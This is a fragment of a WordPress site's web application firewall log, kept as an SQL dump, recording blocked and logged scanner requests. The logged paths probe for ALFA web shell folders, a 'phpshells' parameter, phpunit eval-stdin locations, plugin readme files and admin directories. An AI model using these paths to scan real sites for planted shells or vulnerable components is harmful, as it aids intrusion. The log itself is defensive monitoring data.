User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(12359,1674891565.297534,1674891565.149900,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(12360,1674891564.560990,1674891564.433100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12361,1674891563.790339,1674891563.683800,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12362,1674891563.130400,1674891563.018500,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(12363,1674891562.439140,1674891562.315800,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12364,1674891561.663150,1674891561.551300,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12365,1674891560.738334,1674891560.619100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(12366,1674891560.039455,1674891559.906100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12367,1674891466.952017,1674891466.782200,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12368,1674913154.964593,1674913154.841700,'\0\0\0\0\0\0\0\0\0\0�����\Z',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/secure-file-manager/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZWN1cmUtZmlsZS1tYW5hZ2VyL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZWN1cmUtZmlsZS1tYW5hZ2VyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12369,1674913154.964446,1674913154.841700,'\0\0\0\0\0\0\0\0\0\0�����\Z',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/secure-file-manager/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZWN1cmUtZmlsZS1tYW5hZ2VyL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZWN1cmUtZmlsZS1tYW5hZ2VyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12370,1674920425.775377,1674920425.663900,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12371,1674920423.899712,1674920423.772200,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12372,1674920422.232247,1674920422.102500,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/WordPress/wp-admin/includes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L1dvcmRQcmVzcy93cC1hZG1pbi9pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12373,1674920417.960666,1674920417.849300,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-includes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12374,1674920416.042165,1674920415.935600,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-includes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12375,1674920414.530124,1674920414.420800,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-content/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb250ZW50L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12376,1674920412.425329,1674920412.318200,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/assets/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy9pbWFnZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12377,1674920410.062700,1674920409.918500,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12378,1674920407.321453,1674920407.197300,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12379,1674920405.175029,1674920405.014700,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload/image/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC9pbWFnZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12380,1674920400.720721,1674920400.600800,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12381,1674920396.095072,1674920395.930800,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/elementor/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3Iv\",\"category\":\"brute-force\",\"ssl\":1}'),(12382,1674920388.471038,1674920388.348800,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/user/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(12383,1674920386.216334,1674920386.096400,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/network/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsv\",\"category\":\"brute-force\",\"ssl\":1}'),(12384,1674920384.053335,1674920383.923300,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/meta/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21ldGEv\",\"category\":\"brute-force\",\"ssl\":1}'),(12385,1674920362.069353,1674920361.943500,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12386,1674920324.972123,1674920324.859500,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-admin/includes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1hZG1pbi9pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12387,1674920322.322538,1674920322.208100,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12388,1674920319.299341,1674920319.188100,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/vendor/phpunit/phpunit/src/Util/PHP/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12389,1674920317.797313,1674920317.685200,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12390,1674920316.354884,1674920316.232000,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgi-bin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 